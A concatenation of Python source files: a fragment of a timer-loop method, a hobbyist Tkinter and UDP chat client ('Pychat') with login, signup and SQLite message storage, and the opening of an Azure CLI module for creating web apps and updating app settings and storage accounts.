logger.INFO("Timer=%s has been cancelled", timer.ident())
continue
elif timer.get_interval():
# Repeated timer
timer.update_expiration()
self._timers.add(timer)
has_new_timer = True
cancelling_timers.clear()
if has_new_timer:
self._wakeup()
def _wakeup(self, something="not_None"):
self._wakeup_queue.put(something)
|
Pychat(client).py
|
from tkinter import *
from tkinter import messagebox
import threading
import socket
import time
from itertools import cycle
from ast import literal_eval
import sqlite3
ad=False
serv_search=('127.0.0.1',5001)
serv_online=('127.0.0.1',5002)
serv_del=('127.0.0.1',5003)
serv_msg=('127.0.0.1',10101)
check=False
a=["#D2691E", "#D0661E", "#CE631F", "#CC601F", "#CA5E20", "#C85B20", "#C65821", "#C45521", "#C25322", "#C05022", "#BE4D23", "#BC4A23", "#BA4824", "#B84524", "#B64225", "#B43F25", "#B23D26", "#B03A26", "#AE3727", "#AC3427", "#AA3228", "#A82F28", "#A62C29", "#A52A2A", "#A0282E", "#9C2632", "#982436", "#94223A", "#90203E", "#8C1E42", "#881C46", "#841A4A", "#80184E", "#7C1652", "#781556", "#73135A", "#6F115E", "#6B0F62", "#670D66", "#630B6A", "#5F096E", "#5B0772", "#570576", "#53037A", "#4F017E", "#4B0082", "#47007C", "#440076", "#400070", "#3D006A", "#390064", "#36005E", "#330058", "#2F0052", "#2C004C", "#280046", "#250041", "#22003B", "#1E0035", "#1B002F", "#170029", "#140023", "#11001D", "#0D0017", "#0A0011", "#06000B", "#030005", "#000000", "#080401", "#110802", "#190D04", "#221105", "#2A1506", "#331A08", "#3C1E09", "#44220A", "#4D270C", "#552B0D", "#5E300F", "#673410", "#6F3811", "#783D13", "#804114", "#894515", "#924A17", "#9A4E18", "#A35219", "#AB571B", "#B45B1C", "#BD601E"]
ret=""
b=a[1:]+a[0:1]
c=a[2:]+a[0:2]
d=a[3:]+a[0:3]
e=a[4:]+a[0:4]
f=a[5:]+a[0:5]
g=a[6:]+a[0:6]
h=a[7:]+a[0:7]
def back(x,y,z):
global check
for i in cycle(range(len(a))):
try:
if check==True:
return
y.config(bg=b[i])
x.itemconfig(z[0],fill=a[i])
x.itemconfig(z[1],fill=b[i])
x.itemconfig(z[2],fill=c[i])
x.itemconfig(z[3],fill=d[i])
x.itemconfig(z[4],fill=e[i])
x.itemconfig(z[5],fill=f[i])
x.itemconfig(z[6],fill=g[i])
x.itemconfig(z[7],fill=h[i])
if ret!="":
ret.config(bg=b[i])
time.sleep(0.3)
except:
pass
class login:
def __init__(self):
global ret
self.root=Tk()
self.host='127.0.0.1'
self.port=0
self.server=('127.0.0.1',5000)
self.s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.s.bind((self.host,self.port))
#self.root.bind("<Key>",self.d)
self.username=""
self.cp=""
self.cpp=""
self.rett=""
self.lab=""
self.labb=""
self.window=Canvas(self.root,width=800,height=600)
self.user=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.user.insert(0,"Username")
self.window.create_window(400,300,window=self.user)
self.user.bind("<Button-1>",self.d)
self.pas=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.window.create_window(400,340,window=self.pas)
self.pas.insert(0,"Password")
self.pas.bind("<Button-1>",self.p)
self.log=Button(self.window,text="Log in",width=25,fg="#D3D3D3",command=self.logg)
self.login=self.window.create_window(400,380,window=self.log)
self.tri=[]
self.tri.append(self.window.create_polygon([0,0,0,150,200,0],fill="blue"))
self.tri.append(self.window.create_polygon([0,150,0,300,400,0,200,0]))
self.tri.append(self.window.create_polygon([0,300,0,450,600,0,400,0]))
self.tri.append(self.window.create_polygon([0,450,0,600,800,0,600,0]))
self.tri.append(self.window.create_polygon([0,600,200,600,800,150,800,0]))
self.tri.append(self.window.create_polygon([200,600,400,600,800,300,800,150]))
self.tri.append(self.window.create_polygon([400,600,600,600,800,450,800,300]))
self.tri.append(self.window.create_polygon([600,600,800,600,800,450]))
self.window.pack()
self.window.create_text(400,250,text="PyChat",fill="white",font=("Helvetica",24))
self.text=self.window.create_text(400,550,text="New User? Sign up.",font=("",14),fill="#D3D3D3")
self.window.tag_bind(self.text,"<Button-1>",self.si)
threading.Thread(target=back,args=(self.window,self.log,self.tri,)).start()
def logg(self):
global check
user=self.user.get()
pas=self.pas.get()
print(user+" "+pas)
msg="User "+user+" Pass "+pas
self.s.sendto(msg.encode('utf-8'),self.server)
data=""
while data=="":
data,addr=self.s.recvfrom(1024)
data=str(data.decode('utf-8'))
if data=="Success":
self.username=user
line,addr=self.s.recvfrom(50000)
with open('user.db','wb') as file:
file.write(line)
self.window.pack_forget()
check=True
c=chat(self)
else:
if self.lab=="":
self.lab=Label(self.window,text="Username or Password not correct",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username or Password not correct")
return
def d(self,event):
if self.user.get()=="Username":
self.user.delete(0,END)
self.user.config(fg="black")
def si(self,event):
global ret
self.window.delete(self.login)
self.cp=Entry(self.window,width=30,fg="#D3D3D3",font=("",12))
self.cp.insert(0,"Confirm Password")
self.cp.bind("<Button-1>",self.cnf)
self.cpp=self.window.create_window(400,380,window=self.cp)
self.log.config(text="Signup",command=self.up)
self.login=self.window.create_window(400,420,window=self.log)
ret=Button(self.window,text="Back",width=25,fg="#D3D3D3",command=self.retn)
self.rett=self.window.create_window(400,460,window=ret)
self.window.delete(self.text)
self.pas.delete(0,END)
self.pas.config(fg="#D3D3D3",show="")
self.pas.insert(0,"Password")
if self.lab!="":
self.window.delete(self.labb)
self.lab=""
def up(self):
global check
user=self.user.get()
pas=self.pas.get()
cnf=self.cp.get()
if " " in user:
if self.lab=="":
self.lab=Label(self.window,text="Username cannot contain spaces",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username cannot contain spaces")
return
elif pas!=cnf:
if self.lab=="":
self.lab=Label(self.window,text="Password does not match",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Password does not match")
return
else:
global check
user=self.user.get()
pas=self.pas.get()
print(user+" "+pas)
msg="Signup"+" "+user+" "+pas
self.s.sendto(msg.encode('utf-8'),self.server)
data=""
while data=="":
data,addr=self.s.recvfrom(1024)
data=str(data.decode('utf-8'))
if data=="Success":
self.username=user
self.window.pack_forget()
check=True
c=chat(self)
else:
if self.lab=="":
self.lab=Label(self.window,text="Username already exists",bg='red',fg='white')
self.labb=self.window.create_window(0,0,window=self.lab,width=804,anchor=N+W)
else:
self.lab.config(text="Username already exists")
return
def retn(self):
global ret
if self.lab!="":
self.window.delete(self.labb)
self.lab=""
self.window.delete(self.cpp)
self.window.delete(self.login)
self.window.delete(self.rett)
self.pas.delete(0,END)
self.pas.config(fg="#D3D3D3",show="")
self.pas.insert(0,"Password")
ret=""
self.log.config(text="Log in",command=self.logg)
self.login=self.window.create_window(400,380,window=self.log)
self.text=self.window.create_text(400,550,text="New User? Sign up.",font=("",14),fill="#D3D3D3")
self.window.tag_bind(self.text,"<Button-1>",self.si)
def cnf(self,event):
if self.cp.get()=="Confirm Password":
self.cp.delete(0,END)
self.cp.config(fg="black",show="*")
def p(self,event):
if self.pas.get()=="Password":
self.pas.delete(0,END)
self.pas.config(fg="black",show="*")
class chat:
def __init__(self,other):
self.lock=threading.Lock()
self.other=other
self.root=other.root
self.tx=""
self.con=""
self.cur=""
self.window=Canvas(self.root,width=800,height=600,background="white")
self.temp=""
self.lab=Label(self.window,text="PyChat",fg="green",bg="#D3D3D3",font=("",20))
self.window.create_window(0,39,window=self.lab,anchor=S+W,width=810)
self.fr=Frame(self.window)
self.window.create_window(0,39,window=self.fr,anchor=N+W,width=804,height=524)
self.can=Canvas(self.fr,width=804,height=524)
self.frame=Frame(self.can,bg="blue")
#self.window.create_rectangle(0,35,800,0,fill="#D3D3D3")
#self.out=self.window.create_text(50,20,text="PyChat",fill="green",font=("",20))
self.scrollbar=Scrollbar(self.can,orient=VERTICAL,command=self.can.yview)
self.can.configure(yscrollcommand=self.scrollbar.set)
self.scrollbar.pack(side=RIGHT,fill=Y)
self.lab.bind("<Button-1>",self.page)
self.root.protocol("WM_DELETE_WINDOW",self.ask)
self.can.pack(side=RIGHT,fill=BOTH,expand=True)
self.can.create_window(0,0,window=self.frame,anchor=N+W)
self.search=Entry(self.window,width=20,font=("",12))
self.window.create_window(400,580,window=self.search)
self.window.create_text(240,580,text="Add Username:",fill="green",font=("",12))
self.sbut=Button(self.window,text="ADD",font=("",12),command=self.add)
self.window.create_window(530,580,window=self.sbut)
self.window.pack()
self.frame.bind("<Configure>", self.onFrameConfigure)
self.chats=[]
self.warn=""
self.warnn=""
self.status=""
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.msg).start()
threading.Thread(target=self.load).start()
def load(self):
for i in self.chats:
i.pack_forget()
i.destroy()
self.chats=[]
self.con=sqlite3.connect('user.db')
self.cur=self.con.cursor()
self.cur.execute("CREATE TABLE IF NOT EXISTS buddy(user varchar(64) not null,msg INT,num INT,PRIMARY KEY(user))")
self.cur.execute("CREATE TABLE IF NOT EXISTS data(user varchar(64) not null,msg varchar(10000))")
self.cur.execute("SELECT user FROM buddy ORDER BY num ASC")
line=self.cur.fetchall()
print(line)
if line:
for i in line:
l=Label(self.frame,text=i,font=("",20),width=50,justify=RIGHT)
self.chats.append(l)
l.bind("<Button-1>",lambda x,t=l["text"]:self.texting(t))
l.pack()
self.con.commit()
self.con.close()
def onFrameConfigure(self, event):
self.can.configure(scrollregion=self.can.bbox("all"))
def add(self):
global ad
global serv_search
#ad=True
if self.search.get()!=self.other.username:
self.other.s.sendto((self.search.get()).encode('utf-8'),serv_search)
self.search.delete(0,END)
def texting(self,m):
print(m)
self.other.s.sendto((self.other.username+" "+m).encode('utf-8'),serv_online)
self.window.pack_forget()
self.tx=text(self,m)
#def ba(self):
#global serv_del
#self.other.s.sendto(self.other.username.encode('utf-8'),serv_del)
#self.temp.pack_forget()
#self.window.pack()
def update(self,data):
self.lock.acquire()
con=sqlite3.connect('user.db')
cur=con.cursor()
cur.execute("UPDATE buddy SET num=num+1")
cur.execute("INSERT INTO buddy VALUES(?,0,1)",(data,))
con.commit()
con.close()
self.lock.release()
def rem(self,num=0):
if num==0:
self.window.delete(self.warnn)
else:
self.tx.window.delete(self.warnn)
def msg(self):
global serv_search
global serv_online
data=""
while not ad:
data,addr=self.other.s.recvfrom(1024)
data=data.decode('utf-8')
if addr==serv_search:
if data!="no":
for i in self.chats:
if i["text"]==data[0]:
return
threading.Thread(target=self.update,args=(data,)).start()
threading.Thread(target=self.load).start()
else:
self.warn=Label(self.window,text="Username does not exists",bg='red',fg='white')
self.warnn=self.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
elif addr==serv_online:
if data[0]!="[":
while not hasattr(self.tx,'lab'):
pass
self.tx.lab.config(text=self.tx.name+" - "+str(data))
self.tx.addr=""
#self.status=self.temp.create_text(200,200,text=str(data),font=("",20))
else:
while not hasattr(self.tx,'lab'):
pass
self.tx.lab.config(text=self.tx.name+" - Online")
self.tx.addr=literal_eval(data)
self.tx.addr[1]=int(self.tx.addr[1])
self.tx.addr=tuple(self.tx.addr)
elif addr==serv_msg:
if data[0]!="[":
self.tx.lab.config(text=self.tx.name+" - "+str(data))
self.tx.addr=""
else:
self.tx.lab.config(text=self.tx.name+" - Online")
self.tx.addr=literal_eval(data)
self.tx.addr[1]=int(self.tx.addr[1])
self.tx.addr=tuple(self.tx.addr)
else:
data=data.split(':::::')
if self.tx!="" and addr==self.tx.addr:
Label(self.tx.frame,text=data[1],font=("",14),width=50,bg="red",anchor=W,wraplength=300).pack()
threading.Thread(target=self.save,args=(self.tx.name,data[1],)).start()
elif self.tx!="":
self.warn=Label(self.tx.window,text=data[0]+": "+data[1],bg='red',fg='white')
self.warnn=self.tx.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
for i in self.chats:
if i["text"]==data[0]:
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
return
threading.Thread(target=self.update,args=(data[0],)).start()
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
else:
self.warn=Label(self.window,text=data[0]+": "+data[1],bg='red',fg='white')
self.warnn=self.window.create_window(0,0,window=self.warn,width=804,anchor=N+W)
self.root.after(4000,self.rem)
for i in self.chats:
if i["text"]==data[0]:
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
if self.chats[0]["text"]!=data[0]:
threading.Thread(target=self.load).start()
return
#threading.Thread(target=self.update,args=(data[0],)).start()
con=sqlite3.connect('user.db')
cur=con.cursor()
cur.execute("UPDATE buddy SET num=num+1")
cur.execute("INSERT INTO buddy VALUES(?,0,1)",(data[0],))
con.commit()
con.close()
threading.Thread(target=self.save,args=(data[0],data[1],)).start()
threading.Thread(target=self.load).start()
def page(self,event):
global check
check=False
self.window.pack_forget()
self.other.window.pack()
threading.Thread(target=back,args=(self.other.window,self.other.log,self.other.tri)).start()
#def ad(self,event):
#print("Add")
def ask(self):
global serv_msg
if messagebox.askokcancel("Quit","Do you want to quit?"):
#self.other.s.sendto(("Out "+self.other.username).encode('utf-8'),self.other.server)
with open("user.db","rb") as file:
line=file.read()
self.other.s.sendto(line,serv_msg)
self.root.destroy()
def save(self,name,msg):
self.lock.acquire()
con=sqlite3.connect('user.db')
cur=con.cursor()
if name!=self.other.username:
cur.execute("SELECT num FROM buddy WHERE user=?",(name,))
p=cur.fetchone()
cur.execute("UPDATE buddy SET num=num+1 WHERE num<?",p)
cur.execute("UPDATE buddy SET msg=msg+1,num=1 WHERE user=?",(name,))
cur.execute("SELECT msg FROM buddy WHERE user=?",(name,))
p=cur.fetchone()
cur.execute("INSERT INTO data VALUES(?,?)",(name+":"+self.other.username+":"+str(p[0]),msg,))
else:
cur.execute("SELECT num FROM buddy WHERE user=?",(self.tx.name,))
p=cur.fetchone()
cur.execute("UPDATE buddy SET num=num+1 WHERE num<?",p)
cur.execute("UPDATE buddy SET msg=msg+1,num=1 WHERE user=?",(self.tx.name,))
cur.execute("SELECT msg FROM buddy WHERE user=?",(self.tx.name,))
p=cur.fetchone()
cur.execute("INSERT INTO data VALUES(?,?)",(self.other.username+":"+self.tx.name+":"+str(p[0]),msg,))
con.commit()
con.close()
self.lock.release()
class text:
def __init__(self,other,m):
self.root=other.root
self.other=other
self.obj=self.other.chats
self.name=m
self.window=Canvas(self.root,width=800,height=600,background="white")
self.temp=""
self.addr=""
self.lab=Label(self.window,text=m,fg="green",bg="#D3D3D3",font=("",20))
self.window.create_window(0,39,window=self.lab,anchor=S+W,width=810)
self.lab.bind("<Button-1>",self.ba)
self.fr=Frame(self.window)
self.window.create_window(0,39,window=self.fr,anchor=N+W,width=804,height=524)
self.can=Canvas(self.fr,width=804,height=524)
self.frame=Frame(self.can)
self.scrollbar=Scrollbar(self.can,orient=VERTICAL,command=self.can.yview)
self.can.configure(yscrollcommand=self.scrollbar.set)
self.scrollbar.pack(side=RIGHT,fill=Y)
self.search=Entry(self.window,width=40,font=("",12))
self.window.create_window(300,580,window=self.search)
self.sbut=Button(self.window,text="Send",font=("",12),command=self.send)
self.window.create_window(530,580,window=self.sbut)
self.can.pack(side=RIGHT,fill=BOTH,expand=True)
self.can.create_window(0,0,window=self.frame,anchor=N+W)
self.window.pack()
self.frame.bind("<Configure>", self.onFrameConfigure)
threading.Thread(target=self.load).start()
def onFrameConfigure(self, event):
self.can.configure(scrollregion=self.can.bbox("all"))
def ba(self,e):
global serv_del
self.other.other.s.sendto(self.other.other.username.encode('utf-8'),serv_del)
self.window.pack_forget()
self.other.window.pack()
if self.obj!=self.other.chats:
threading.Thread(target=self.other.load).start()
self.other.tx=""
def send(self):
if self.addr!="":
msg=self.search.get()
self.other.other.s.sendto((self.other.other.username+":::::"+msg).encode('utf-8'),self.addr)
self.search.delete(0,END)
Label(self.frame,text=msg,font=("",14),width=50,anchor=E,bg="blue",wraplength=300).pack()
threading.Thread(target=self.other.save,args=(self.other.other.username,msg,)).start()
"""else:
msg=self.search.get()
self.other.other.s.sendto(msg.encode('utf-8'),serv_msg)
self.search.delete(0,END)
Label(self.frame,text=i[1],font=("",14),width=90,justify=RIGHT,wraplength=300).pack()
threading.Thread(target=self.save,args=(self.other.other.username,msg,)).start()"""
def load(self):
self.con=sqlite3.connect('user.db')
self.cur=self.con.cursor()
self.cur=self.cur.execute("SELECT * FROM data WHERE (user LIKE ? OR user LIKE ?)",(self.name+"%",self.other.other.username+":"+self.name+"%",))
line=self.cur.fetchall()
if line:
for i in line:
if i[0].startswith(self.name):
Label(self.frame,text=i[1],font=("",14),pady=20,width=50,bg="red",anchor=W,wraplength=300).pack()
else:
Label(self.frame,text=i[1],font=("",14),pady=20,width=50,bg="blue",anchor=E,wraplength=300).pack()
l=login()
l.root.resizable(0,0)
l.root.mainloop()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from nacl import encoding, public
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import _normalize_sku, get_sku_name, retryable_method, raise_missing_token_suggestion
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
